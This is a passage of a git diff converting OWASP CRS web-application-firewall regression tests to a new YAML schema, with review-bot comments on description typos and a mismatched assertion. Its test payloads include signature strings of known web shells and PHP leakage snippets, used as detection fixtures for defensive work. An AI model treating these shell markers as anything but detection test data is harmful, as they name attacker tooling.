"HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"} + output: + log: + expect_ids: [951250] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml index e8f9373..852a607 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951260.yaml" - description: "Regression tests for rule 951260" +rule_id: 951260 tests: - - test_title: 951260-1 + - test_id: 1 desc: "Matching Sybase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"} - output: - log_contains: "id \"951260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"} + output: + log: + expect_ids: [951260] diff --git a/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml index d4dfc5e..18149c3 100644 --- a/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml +++ b/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml 
@@ -1,107 +1,105 @@ --- meta: author: "M4tteoP, Esad Cetiner, azurit" - enabled: true - name: "953100.yaml" - description: "Tests for rule 953100" +rule_id: 953100 tests: - - test_title: 953100-1 + - test_id: 1 desc: "'File size is' leads to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Maximum allowed file size is 10 MB" - output: - no_log_contains: id "953100" - - test_title: 953100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Maximum allowed file size is 10 MB" + output: + log: + no_expect_ids: [953100] + - test_id: 2 desc: "'Invalid date' Wordpress FP, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Invalid date selected" - output: - no_log_contains: id "953100" - - test_title: 953100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Invalid date selected" + output: + log: + no_expect_ids: [953100] + - test_id: 3 desc: "'The function' might lead to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "please review the function" - output: - no_log_contains: id "953100" - - test_title: 953100-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "please review the function" + output: + log: + no_expect_ids: [953100] + - test_id: 4 desc: "'Static function' might lead to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "This is a static function" - output: - no_log_contains: id "953100" - - test_title: 953100-5 + - input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "This is a static function" + output: + log: + no_expect_ids: [953100] + - test_id: 5 desc: "'cannot be empty is too common for PL1 GH isue #3399" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Field cannot be empty." - output: - no_log_contains: id "953100" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Field cannot be empty." + output: + log: + no_expect_ids: [953100] diff --git a/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml index 57a366f..abb4ceb 100644 --- a/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml +++ b/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml 
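Review bot: Test 5's `desc: "'cannot be empty is too common for PL1 GH isue #3399"` has an unclosed quote and a misspelling; suggest `desc: "'cannot be empty' is too common for PL1, GH issue #3399"`. The same wording recurs in test 5 of the 953101 hunk (`… it should match at PL2 GH isue #3399`). Both are context lines, so this is a follow-up rather than a defect the migration introduced.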
@@ -1,112 +1,110 @@ --- meta: author: "M4tteoP, Esad Cetiner, azurit" - enabled: true - name: "953101.yaml" - description: "Tests for rule 953101" +rule_id: 953101 tests: - - test_title: 953101-1 + - test_id: 1 desc: "'File size is' leads to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Maximum allowed file size is 10 MB"} - output: - log_contains: id "953101" - - test_title: 953101-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Maximum allowed file size is 10 MB"} + output: + log: + expect_ids: [953101] + - test_id: 2 desc: "'Invalid date' leads to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Invalid date selected"} - output: - log_contains: id "953101" - - test_title: 953101-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS 
test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Invalid date selected"} + output: + log: + expect_ids: [953101] + - test_id: 3 desc: "'The function' might lead to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Please review the function"} - output: - log_contains: id "953101" - - test_title: 953101-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Please review the function"} + output: + log: + expect_ids: [953101] + - test_id: 4 desc: "'Static function' might lead to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "This is a static 
function"} - output: - log_contains: id "953101" - - test_title: 953101-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "This is a static function"} + output: + log: + expect_ids: [953101] + - test_id: 5 desc: "'cannot be empty is too common for PL1, it should match at PL2 GH isue #3399" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "cannot be empty."} - output: - log_contains: id "953101" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "cannot be empty."} + output: + log: + expect_ids: [953101] diff --git a/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml index 23d215a..ddcfda8 100644 --- a/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml +++ b/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml 
@@ -1,151 +1,149 @@ --- meta: author: "fzipi, azurit" - enabled: true - name: "953120.yaml" - description: "Positive tests for rule 953120" +rule_id: 953120 tests: - - test_title: 953120-1 + - test_id: 1 desc: "Just something that returns \"}" - output: - log_contains: "id \"953120\"" - - test_title: 953120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log: + expect_ids: [953120] + - test_id: 2 desc: "Negative test, returns \"}" - output: - log_contains: "id \"953120\"" - - test_title: 953120-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log: + expect_ids: [953120] + - test_id: 6 desc: "Negative test, returns \"}" - output: - log_contains: "id \"953120\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log: + expect_ids: [953120] diff --git a/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml index 4631f2c..fb954c0 100644 --- a/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml 
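Review bot: Test 2's `desc: "Negative test, returns …"` contradicts its assertion, which is the positive `expect_ids: [953120]`, identical to test 1; either the description or the expectation is wrong, and a true negative case would use `no_expect_ids: [953120]` as the 953100 hunk does. The reflected body text is not visible in this rendering, so which side is wrong cannot be confirmed from here. The retained ids also jump from 2 to 6, which suggests tests 3–5 were removed earlier; a one-line comment on why the gap exists would help whoever renumbers next.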
+++ b/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml @@ -1,25 +1,23 @@ --- meta: author: "Andrew Howe" - enabled: true - name: "954100.yaml" - description: "Tests for rule 954100" +rule_id: 954100 tests: - - test_title: 954100-1 + - test_id: 1 desc: 'Returns C:\inetpub in the response body' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"C:\\\\inetpub \\n\"}" - output: - log_contains: "id \"954100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"C:\\\\inetpub \\n\"}" + output: + log: + expect_ids: [954100] diff --git a/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml b/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml index c57700a..f13c4f3 100644 --- a/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml +++ b/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml 
@@ -1,45 +1,44 @@ --- meta: author: "Felipe Zipitria, azurit" - enabled: true - name: "954120.yaml" - description: "Tests for rule 954120 - IIS Error information disclusure" + description: "IIS Error information disclusure" +rule_id: 954120 tests: - - test_title: 954120-1 + - test_id: 1 desc: 'Match IIS error page' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "text=404.14 - URL too long."} - output: - log_contains: id "954120" - - test_title: 954120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "text=404.14 - URL too long."} + output: + log: + expect_ids: [954120] + - test_id: 2 desc: 'Match IIS error page' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed."} - output: - log_contains: id "954120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: 
"HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed."} + output: + log: + expect_ids: [954120] diff --git a/tests/RESPONSE-955-WEB-SHELLS/955100.yaml b/tests/RESPONSE-955-WEB-SHELLS/955100.yaml index 52e743d..eb0f784 100644 --- a/tests/RESPONSE-955-WEB-SHELLS/955100.yaml +++ b/tests/RESPONSE-955-WEB-SHELLS/955100.yaml @@ -1,70 +1,68 @@ --- meta: author: "azurit" - enabled: true - name: "955100.yaml" - description: "Regression tests for rule 955100" +rule_id: 955100 tests: - - test_title: 955100-1 + - test_id: 1 desc: "Matching web shell NCC Shell" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "

.:NCC:. Shell v"} - output: - log_contains: "id \"955100\"" - - test_title: 955100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "

.:NCC:. Shell v"} + output: + log: + expect_ids: [955100] + - test_id: 2 desc: "Matching web shell Simple PHP backdoor" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": ""} - output: - log_contains: "id \"955100\"" - - test_title: 955100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": ""} + output: + log: + expect_ids: [955100] + - test_id: 3 desc: "Matching web shell WinX Shell" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "-:[GreenwooD]:- WinX Shell"} - output: - log_contains: "id \"955100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + 
uri: "/reflect" + data: |- + {"body": "-:[GreenwooD]:- WinX Shell"} + output: + log: + expect_ids: [955100] diff --git a/tests/RESPONSE-955-WEB-SHELLS/955260.yaml b/tests/RESPONSE-955-WEB-SHELLS/955260.yaml index 68483c2..4098fec 100644 --- a/tests/RESPONSE-955-WEB-SHELLS/955260.yaml +++ b/tests/RESPONSE-955-WEB-SHELLS/955260.yaml @@ -1,27 +1,25 @@ --- meta: author: "azurit" - enabled: true - name: "955260.yaml" - description: "Regression tests for rule 955260" +rule_id: 955260 tests: - - test_title: 955260-1 + - test_id: 1 desc: "Matching web shell Ru24PostWebShell. Our test infrastructure, currently, cannot run this test properly because of multiline output, so it's disabled." stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: "{\"body\": \"\\n\\nRu24PostWebShell -\"}" - output: - log_contains: "id \"955260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: "{\"body\": \"<html>\\n<head>\\n<title>Ru24PostWebShell -\"}" + output: + log: + expect_ids: [955260] diff --git a/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml index 46a3b54..1f1dbe8 100644 --- a/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml +++ b/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml 
@@ -1,72 +1,71 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "959100.yaml" description: | Test whether the outbound blocking mechanism works by testing whether rule 959100 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking rule to be triggered. +rule_id: 959100 tests: - - test_title: 959100-1 + - test_id: 1 desc: Test is basically identical to 953120-1 (PHP leakage positive test in phase 4) but here we assert that the outbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" - output: - log_contains: "id \"959100\"" - - test_title: 959100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" + output: + log: + expect_ids: [959100] + - test_id: 2 desc: Test is basically identical to 953120-1 (PHP leakage negative test in phase 4) but here we assert that the outbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test 
agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "<?php12345"} - output: - no_log_contains: "id \"959100\"" - - test_title: 959100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "<?php12345"} + output: + log: + no_expect_ids: [959100] + - test_id: 3 desc: Test is basically identical to 959100-1 (see above) but here we assert that the scores are summed up and reported properly stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" - output: - log_contains: "Outbound Anomaly Score Exceeded [(]Total Score: " + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" 
